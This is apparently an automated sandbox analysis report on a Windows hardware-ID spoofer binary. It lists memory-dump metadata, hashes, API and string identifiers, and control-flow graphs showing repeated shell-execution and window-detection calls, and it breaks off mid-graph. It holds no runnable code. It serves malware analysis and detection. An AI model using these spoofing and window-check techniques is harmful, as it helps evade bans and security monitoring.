                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF60C47F543
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@@$Window$Console$CreateThread$?sputc@?$basic_streambuf@AsyncShowState$?cout@std@@3D@std@@@1@SleepTitleV?$basic_ostream@$?setstate@?$basic_ios@?uncaught_exception@std@@BeepOsfx@?$basic_ostream@_invalid_parameter_noinfo_noreturnsystem
                                                                                                                                                                                                                                                                                      • String ID: Done Temp Spoofing$TEMP SPOOFER$ [ $ -> $1$2$2$3$4$5$6$7$9$CHECK SERIALS$SPOOF$S]A3
                                                                                                                                                                                                                                                                                      • API String ID: 869532424-3755480597
                                                                                                                                                                                                                                                                                      • Opcode ID: 22e29affa479bd1bfca02ff3d1d5a15b1132895608d33967fa2d948d2c5707e5
                                                                                                                                                                                                                                                                                      • Instruction ID: 75926303f70e2dc27ebc24e91ca4fcb0e7e6e24d746aaf78ae2e228f6ada86ad
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22e29affa479bd1bfca02ff3d1d5a15b1132895608d33967fa2d948d2c5707e5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D921722E2878285FB01DB34E4016ADA360FF567DCF609332E95D66A96DF7CE189D340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system
                                                                                                                                                                                                                                                                                      • String ID: `s|euE$botbT$jg|j\$xkd}m]
                                                                                                                                                                                                                                                                                      • API String ID: 3377271179-510302471
                                                                                                                                                                                                                                                                                      • Opcode ID: 8291136752d49d689ac9a452295240dc7c156ff6b36018ea8372d3a1f1d07ba9
                                                                                                                                                                                                                                                                                      • Instruction ID: 46e7ba84dc0ee45be03e5cda3e34322e441fc62089fd651d20b38d477959a9f3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8291136752d49d689ac9a452295240dc7c156ff6b36018ea8372d3a1f1d07ba9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7773B86AE2FB864BF7039A3680114E8E3646FB7288791D723FD1475993FF6A71C24244
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system
                                                                                                                                                                                                                                                                                      • String ID: `s|euE$botbT$jg|j\$xkd}m]
                                                                                                                                                                                                                                                                                      • API String ID: 3377271179-510302471
                                                                                                                                                                                                                                                                                      • Opcode ID: bfd3e1c4269bcca8e659f7541d9e559473252477099390882b82c8c83742f1f2
                                                                                                                                                                                                                                                                                      • Instruction ID: 90553cb2f0ff2b77fb3fa8ff21dc69e3b886d37862b118719c5f74a3a48167ad
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfd3e1c4269bcca8e659f7541d9e559473252477099390882b82c8c83742f1f2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E853B86AE2FB864BF7039A3680114E8E3646FB7288791D723FD1475993FF6A71C24244
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system
                                                                                                                                                                                                                                                                                      • String ID: `s|euE$botbT$jg|j\$xkd}m]
                                                                                                                                                                                                                                                                                      • API String ID: 3377271179-510302471
                                                                                                                                                                                                                                                                                      • Opcode ID: e1f982f7fabb7246d735c5032f75ab582b82ad22f009b76f32db6b78005b29d1
                                                                                                                                                                                                                                                                                      • Instruction ID: 9bdc24e3f3c7b27ed3d8605e68a395c2c17643665bc176e1848c045c01fa2006
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1f982f7fabb7246d735c5032f75ab582b82ad22f009b76f32db6b78005b29d1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A13B76AE2FB864BF703963680124E8E3646FB7288791D723FD1475952FF6AB1C24244

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1041 7ff60c4819f0-7ff60c481a77 1042 7ff60c481a80-7ff60c481a8e 1041->1042 1042->1042 1043 7ff60c481a90-7ff60c481ae0 system 1042->1043 1044 7ff60c481ae3-7ff60c481aea 1043->1044 1044->1044 1045 7ff60c481aec-7ff60c481b22 call 7ff60c48271c call 7ff60c47da30 call 7ff60c47e430 1044->1045 1052 7ff60c481b5d-7ff60c481b60 1045->1052 1053 7ff60c481b24-7ff60c481b3a 1045->1053 1056 7ff60c481d77-7ff60c481dda 1052->1056 1057 7ff60c481b66-7ff60c481be8 1052->1057 1054 7ff60c481b3c-7ff60c481b4f 1053->1054 1055 7ff60c481b58 call 7ff60c482f5c 1053->1055 1054->1055 1059 7ff60c481b51-7ff60c481b57 _invalid_parameter_noinfo_noreturn 1054->1059 1055->1052 1058 7ff60c481de0-7ff60c481dee 1056->1058 1061 7ff60c481bf0-7ff60c481cd0 1057->1061 1058->1058 1062 7ff60c481df0-7ff60c481e34 system call 7ff60c4824b0 1058->1062 1059->1055 1061->1061 1063 7ff60c481cd6-7ff60c481cda 1061->1063 1069 7ff60c481e37-7ff60c481e3e 1062->1069 1065 7ff60c481cdc 1063->1065 1066 7ff60c481cf5-7ff60c481d71 ShellExecuteW 1063->1066 1068 7ff60c481ce1-7ff60c481cf3 1065->1068 1066->1056 1068->1066 1068->1068 1069->1069 1070 7ff60c481e40-7ff60c481e76 call 7ff60c48271c call 7ff60c47da30 call 7ff60c47e430 1069->1070 1077 7ff60c481e78-7ff60c481e8e 1070->1077 1078 7ff60c481eb1-7ff60c481eb4 1070->1078 1081 7ff60c481eac call 7ff60c482f5c 1077->1081 1082 7ff60c481e90-7ff60c481ea3 1077->1082 1079 7ff60c481eba-7ff60c481fb3 call 7ff60c482530 ShellExecuteW 1078->1079 1080 7ff60c481fb9-7ff60c48201c 1078->1080 1079->1080 1085 7ff60c482020-7ff60c48202e 1080->1085 1081->1078 1082->1081 1086 7ff60c481ea5-7ff60c481eab _invalid_parameter_noinfo_noreturn 1082->1086 1085->1085 1088 7ff60c482030-7ff60c482074 system call 7ff60c4824b0 1085->1088 1086->1081 1091 7ff60c482077-7ff60c48207e 1088->1091 1091->1091 1092 7ff60c482080-7ff60c4820b6 call 7ff60c48271c call 7ff60c47da30 call 7ff60c47e430 1091->1092 1099 7ff60c4820b8-7ff60c4820ce 1092->1099 1100 7ff60c4820f1-7ff60c4820f4 1092->1100 1101 7ff60c4820ec call 7ff60c482f5c 1099->1101 1102 7ff60c4820d0-7ff60c4820e3 1099->1102 1103 7ff60c4820fa-7ff60c4821f3 call 7ff60c482530 ShellExecuteW 1100->1103 1104 7ff60c4821f9-7ff60c482257 1100->1104 1101->1100 1102->1101 1105 7ff60c4820e5-7ff60c4820eb _invalid_parameter_noinfo_noreturn 1102->1105 1103->1104 1108 7ff60c482260-7ff60c4822ae 1104->1108 1105->1101 1108->1108 1110 7ff60c4822b0-7ff60c4822fa system 1108->1110 1111 7ff60c482300-7ff60c482307 1110->1111 1111->1111 1112 7ff60c482309-7ff60c48233f call 7ff60c48271c call 7ff60c47da30 call 7ff60c47e430 1111->1112 1119 7ff60c48237a-7ff60c48237c 1112->1119 1120 7ff60c482341-7ff60c482357 1112->1120 1123 7ff60c482382-7ff60c48247b call 7ff60c482530 ShellExecuteW 1119->1123 1124 7ff60c482481-7ff60c4824a6 Sleep 1119->1124 1121 7ff60c482359-7ff60c48236c 1120->1121 1122 7ff60c482375 call 7ff60c482f5c 1120->1122 1121->1122 1125 7ff60c48236e-7ff60c482374 _invalid_parameter_noinfo_noreturn 1121->1125 1122->1119 1123->1124 1125->1122
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExecuteShell__std_fs_code_page_invalid_parameter_noinfo_noreturnsystem
                                                                                                                                                                                                                                                                                      • String ID: 64.e$=!?$core$h\rt$z0.2
                                                                                                                                                                                                                                                                                      • API String ID: 2996404153-2502185576
                                                                                                                                                                                                                                                                                      • Opcode ID: 6dfa772f9c7c5ddc4c143da95c9c8d161db4e961806752f527b60f9826468c47
                                                                                                                                                                                                                                                                                      • Instruction ID: ec8133fabb2a0f41ff19c28dcf71006553913936178ec9aa8a6fc8a125cbedf7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6dfa772f9c7c5ddc4c143da95c9c8d161db4e961806752f527b60f9826468c47
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E628E72E147818AF701CFB490016AC7772BF5679CF518329EE487AA9AEF74A149C384

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1129 7ff60c47b6d0-7ff60c47b77d 1130 7ff60c47b885-7ff60c47b88f 1129->1130 1131 7ff60c47b783-7ff60c47b78d 1129->1131 1133 7ff60c47b890-7ff60c47b8c2 1130->1133 1132 7ff60c47b790-7ff60c47b879 1131->1132 1132->1132 1134 7ff60c47b87f-7ff60c47b883 1132->1134 1133->1133 1135 7ff60c47b8c4-7ff60c47b8d3 FindWindowA 1133->1135 1134->1130 1134->1135 1136 7ff60c47b8da-7ff60c47b921 1135->1136 1137 7ff60c47b8d5 call 7ff60c475ee0 1135->1137 1139 7ff60c47b927-7ff60c47b938 1136->1139 1140 7ff60c47ba35-7ff60c47ba3f 1136->1140 1137->1136 1141 7ff60c47b940-7ff60c47ba29 1139->1141 1142 7ff60c47ba40-7ff60c47ba72 1140->1142 1141->1141 1143 7ff60c47ba2f-7ff60c47ba33 1141->1143 1142->1142 1144 7ff60c47ba74-7ff60c47ba83 FindWindowA 1142->1144 1143->1140 1143->1144 1145 7ff60c47ba8a-7ff60c47bacd 1144->1145 1146 7ff60c47ba85 call 7ff60c475ee0 1144->1146 1148 7ff60c47bc15-7ff60c47bc1f 1145->1148 1149 7ff60c47bad3-7ff60c47bc10 1145->1149 1146->1145 1150 7ff60c47bc20-7ff60c47bc52 1148->1150 1149->1148 1150->1150 1151 7ff60c47bc54-7ff60c47bc63 FindWindowA 1150->1151 1152 7ff60c47bc6a-7ff60c47bc99 1151->1152 1153 7ff60c47bc65 call 7ff60c475ee0 1151->1153 1155 7ff60c47bda5-7ff60c47bdaf 1152->1155 1156 7ff60c47bc9f-7ff60c47bcac 1152->1156 1153->1152 1158 7ff60c47bdb0-7ff60c47bde2 1155->1158 1157 7ff60c47bcb0-7ff60c47bd99 1156->1157 1157->1157 1159 7ff60c47bd9f-7ff60c47bda3 1157->1159 1158->1158 1160 7ff60c47bde4-7ff60c47bdf3 FindWindowA 1158->1160 1159->1155 1159->1160 1161 7ff60c47bdfa-7ff60c47be42 FindWindowA 1160->1161 1162 7ff60c47bdf5 call 7ff60c475ee0 1160->1162 1164 7ff60c47be49-7ff60c47be90 FindWindowA 1161->1164 1165 7ff60c47be44 call 7ff60c4751c0 1161->1165 1162->1161 1167 7ff60c47be97-7ff60c47bebe 1164->1167 1168 7ff60c47be92 call 7ff60c4751c0 1164->1168 1165->1164 1170 7ff60c47c054-7ff60c47c063 FindWindowA 1167->1170 1171 7ff60c47bec4-7ff60c47beca 1167->1171 1168->1167 1174 7ff60c47c06a-7ff60c47c0a5 FindWindowA 1170->1174 1175 7ff60c47c065 call 7ff60c4751c0 1170->1175 1172 7ff60c47c012-7ff60c47c01c 1171->1172 1173 7ff60c47bed0-7ff60c47c00d 1171->1173 1178 7ff60c47c020-7ff60c47c052 1172->1178 1173->1172 1176 7ff60c47c0ac-7ff60c47c0d1 1174->1176 1177 7ff60c47c0a7 call 7ff60c4751c0 1174->1177 1175->1174 1181 7ff60c47c0d7-7ff60c47c0dd 1176->1181 1182 7ff60c47c2d4-7ff60c47c2e3 FindWindowA 1176->1182 1177->1176 1178->1170 1178->1178 1183 7ff60c47c0e3-7ff60c47c28a 1181->1183 1184 7ff60c47c28f-7ff60c47c299 1181->1184 1185 7ff60c47c2ea-7ff60c47c2f9 1182->1185 1186 7ff60c47c2e5 call 7ff60c475ee0 1182->1186 1183->1184 1187 7ff60c47c2a0-7ff60c47c2d2 1184->1187 1189 7ff60c47c39a-7ff60c47c3a9 FindWindowA 1185->1189 1190 7ff60c47c2ff-7ff60c47c305 1185->1190 1186->1185 1187->1182 1187->1187 1191 7ff60c47c3ab call 7ff60c4751c0 1189->1191 1192 7ff60c47c3b0-7ff60c47c3cb 1189->1192 1193 7ff60c47c368-7ff60c47c36c 1190->1193 1194 7ff60c47c307-7ff60c47c366 1190->1194 1191->1192 1196 7ff60c47c57d-7ff60c47c5a1 1192->1196 1197 7ff60c47c3d1-7ff60c47c578 1192->1197 1198 7ff60c47c370-7ff60c47c398 1193->1198 1194->1189 1197->1196 1198->1189 1198->1198
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FindWindow$system
                                                                                                                                                                                                                                                                                      • String ID: )%31)?N$767!T$=:.233^$M^]^N=$T_aCM5$pXYPYO>
                                                                                                                                                                                                                                                                                      • API String ID: 2416310371-3215855770
                                                                                                                                                                                                                                                                                      • Opcode ID: 95ecd9ff6b6ae79d9b95f1a969290d5a6be885e2354fe601215a673cfa458a34
                                                                                                                                                                                                                                                                                      • Instruction ID: e5fd42b16a88a776340af2920af3a1891566e914e718c43539b3ad9ecfdb945b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95ecd9ff6b6ae79d9b95f1a969290d5a6be885e2354fe601215a673cfa458a34
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5482E626E2EB824EF7039B7580034E8E764AFB72C8761D327F94475997EF6A71858304

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1200 7ff60c47a43e-7ff60c47a458 1201 7ff60c47a45a-7ff60c47a4a0 system 1200->1201 1202 7ff60c47a430-7ff60c47a43c 1200->1202 1203 7ff60c47a4a6-7ff60c47a5b3 1201->1203 1204 7ff60c47a5b5-7ff60c47a5bf 1201->1204 1202->1200 1203->1204 1207 7ff60c47a5f4-7ff60c47a63d system 1203->1207 1206 7ff60c47a5c0-7ff60c47a5f2 1204->1206 1206->1206 1206->1207 1208 7ff60c47a745-7ff60c47a74f 1207->1208 1209 7ff60c47a643-7ff60c47a64d 1207->1209 1211 7ff60c47a750-7ff60c47a782 1208->1211 1210 7ff60c47a650-7ff60c47a739 1209->1210 1210->1210 1212 7ff60c47a73f-7ff60c47a743 1210->1212 1211->1211 1213 7ff60c47a784-7ff60c47a7cd system 1211->1213 1212->1208 1212->1213 1214 7ff60c47a8d5-7ff60c47a8df 1213->1214 1215 7ff60c47a7d3-7ff60c47a7dd 1213->1215 1216 7ff60c47a8e0-7ff60c47a912 1214->1216 1217 7ff60c47a7e0-7ff60c47a8c9 1215->1217 1216->1216 1218 7ff60c47a914-7ff60c47a967 system 1216->1218 1217->1217 1219 7ff60c47a8cf-7ff60c47a8d3 1217->1219 1220 7ff60c47a96d-7ff60c47a97a 1218->1220 1221 7ff60c47aa75-7ff60c47aa7f 1218->1221 1219->1214 1219->1218 1222 7ff60c47a980-7ff60c47aa69 1220->1222 1223 7ff60c47aa80-7ff60c47aab2 1221->1223 1222->1222 1224 7ff60c47aa6f-7ff60c47aa73 1222->1224 1223->1223 1225 7ff60c47aab4-7ff60c47ab07 system 1223->1225 1224->1221 1224->1225 1226 7ff60c47ab0d-7ff60c47ab1a 1225->1226 1227 7ff60c47ac15-7ff60c47ac1f 1225->1227 1228 7ff60c47ab20-7ff60c47ac09 1226->1228 1229 7ff60c47ac20-7ff60c47ac52 1227->1229 1228->1228 1230 7ff60c47ac0f-7ff60c47ac13 1228->1230 1229->1229 1231 7ff60c47ac54-7ff60c47aca3 system 1229->1231 1230->1227 1230->1231 1232 7ff60c47aca9-7ff60c47adb3 1231->1232 1233 7ff60c47adb5-7ff60c47adbf 1231->1233 1232->1233 1236 7ff60c47adf4-7ff60c47ae3b system 1232->1236 1234 7ff60c47adc0-7ff60c47adf2 1233->1234 1234->1234 1234->1236 1237 7ff60c47af45-7ff60c47af4f 1236->1237 1238 7ff60c47ae41-7ff60c47ae4f 1236->1238 1240 7ff60c47af50-7ff60c47af82 1237->1240 1239 7ff60c47ae50-7ff60c47af39 1238->1239 1239->1239 1241 7ff60c47af3f-7ff60c47af43 1239->1241 1240->1240 1242 7ff60c47af84-7ff60c47afcc system 1240->1242 1241->1237 1241->1242 1243 7ff60c47b0d5-7ff60c47b0df 1242->1243 1244 7ff60c47afd2-7ff60c47afdf 1242->1244 1246 7ff60c47b0e0-7ff60c47b112 1243->1246 1245 7ff60c47afe0-7ff60c47b0c9 1244->1245 1245->1245 1247 7ff60c47b0cf-7ff60c47b0d3 1245->1247 1246->1246 1248 7ff60c47b114-7ff60c47b145 system 1246->1248 1247->1243 1247->1248 1249 7ff60c47b14b-7ff60c47b15b 1248->1249 1250 7ff60c47b24f-7ff60c47b26b 1248->1250 1251 7ff60c47b160-7ff60c47b247 1249->1251 1252 7ff60c47b28a-7ff60c47b2bb system 1250->1252 1251->1251 1253 7ff60c47b24d 1251->1253 1254 7ff60c47b3c5-7ff60c47b3cf 1252->1254 1255 7ff60c47b2c1-7ff60c47b2ce 1252->1255 1253->1252 1257 7ff60c47b3d0-7ff60c47b402 1254->1257 1256 7ff60c47b2d0-7ff60c47b3b9 1255->1256 1256->1256 1258 7ff60c47b3bf-7ff60c47b3c3 1256->1258 1257->1257 1259 7ff60c47b404-7ff60c47b433 system 1257->1259 1258->1254 1258->1259 1260 7ff60c47b439-7ff60c47b43c 1259->1260 1261 7ff60c47b68f-7ff60c47b6c6 system 1259->1261 1262 7ff60c47b649-7ff60c47b66f 1260->1262 1263 7ff60c47b442-7ff60c47b644 1260->1263 1263->1262
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system
                                                                                                                                                                                                                                                                                      • String ID: `s|euE$xkd}m]
                                                                                                                                                                                                                                                                                      • API String ID: 3377271179-1433009472
                                                                                                                                                                                                                                                                                      • Opcode ID: 6a925d4e27772ebcdf6e6c5688064880de5e22a4416756bc6e0a5950695f4d35
                                                                                                                                                                                                                                                                                      • Instruction ID: 90e9d39c075675016bd076da78fe766733a8285ed55ebb927c16f91e1f6c6ef6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a925d4e27772ebcdf6e6c5688064880de5e22a4416756bc6e0a5950695f4d35
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22A2B56AE2EB864FF703963680124E8E3646FB7288791E723FD1475953FF69B1C24244

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1265 7ff60c47c5a7-7ff60c47c5c2 1266 7ff60c47c5c4-7ff60c47c5d3 FindWindowA 1265->1266 1267 7ff60c47c590-7ff60c47c5a4 1265->1267 1268 7ff60c47c5da-7ff60c47c5f5 1266->1268 1269 7ff60c47c5d5 call 7ff60c475ee0 1266->1269 1267->1265 1271 7ff60c47c5fb-7ff60c47c7a2 1268->1271 1272 7ff60c47c7a7-7ff60c47c7ae 1268->1272 1269->1268 1271->1272 1273 7ff60c47c7b1-7ff60c47c7e3 1272->1273 1273->1273 1274 7ff60c47c7e5-7ff60c47c7f4 FindWindowA 1273->1274 1275 7ff60c47c7fb-7ff60c47c816 1274->1275 1276 7ff60c47c7f6 call 7ff60c475ee0 1274->1276 1278 7ff60c47c81c-7ff60c47c9c3 1275->1278 1279 7ff60c47c9c8-7ff60c47c9d6 1275->1279 1276->1275 1278->1279 1280 7ff60c47c9e0-7ff60c47ca12 1279->1280 1280->1280 1281 7ff60c47ca14-7ff60c47ca23 FindWindowA 1280->1281 1282 7ff60c47ca2a-7ff60c47ca45 1281->1282 1283 7ff60c47ca25 call 7ff60c475ee0 1281->1283 1285 7ff60c47ca4b-7ff60c47cbf2 1282->1285 1286 7ff60c47cbf7-7ff60c47cbfe 1282->1286 1283->1282 1285->1286 1287 7ff60c47cc01-7ff60c47cc33 1286->1287 1287->1287 1288 7ff60c47cc35-7ff60c47cc44 FindWindowA 1287->1288 1289 7ff60c47cc4b-7ff60c47cc66 1288->1289 1290 7ff60c47cc46 call 7ff60c475ee0 1288->1290 1292 7ff60c47cc6c-7ff60c47ce13 1289->1292 1293 7ff60c47ce18-7ff60c47ce26 1289->1293 1290->1289 1292->1293 1294 7ff60c47ce30-7ff60c47ce62 1293->1294 1294->1294 1295 7ff60c47ce64-7ff60c47ce73 FindWindowA 1294->1295 1296 7ff60c47ce7a-7ff60c47ce89 1295->1296 1297 7ff60c47ce75 call 7ff60c475ee0 1295->1297 1298 7ff60c47cf2a-7ff60c47cf39 FindWindowA 1296->1298 1299 7ff60c47ce8f-7ff60c47ce95 1296->1299 1297->1296 1303 7ff60c47cf3b call 7ff60c4751c0 1298->1303 1304 7ff60c47cf40-7ff60c47cf51 1298->1304 1301 7ff60c47cef8-7ff60c47cefc 1299->1301 1302 7ff60c47ce97-7ff60c47cef6 1299->1302 1305 7ff60c47cf00-7ff60c47cf28 1301->1305 1302->1298 1303->1304 1307 7ff60c47d06a-7ff60c47d079 FindWindowA 1304->1307 1308 7ff60c47cf57-7ff60c47cf5d 1304->1308 1305->1298 1305->1305 1311 7ff60c47d07b call 7ff60c4751c0 1307->1311 1312 7ff60c47d080-7ff60c47d0a6 1307->1312 1309 7ff60c47d036-7ff60c47d03a 1308->1309 1310 7ff60c47cf63-7ff60c47d034 1308->1310 1315 7ff60c47d040-7ff60c47d068 1309->1315 1310->1307 1311->1312 1313 7ff60c47d0ac-7ff60c47d1e9 1312->1313 1314 7ff60c47d1ee-7ff60c47d1f8 1312->1314 1313->1314 1317 7ff60c47d200-7ff60c47d232 1314->1317 1315->1307 1315->1315 1317->1317 1318 7ff60c47d234-7ff60c47d243 FindWindowA 1317->1318 1319 7ff60c47d24a-7ff60c47d266 1318->1319 1320 7ff60c47d245 call 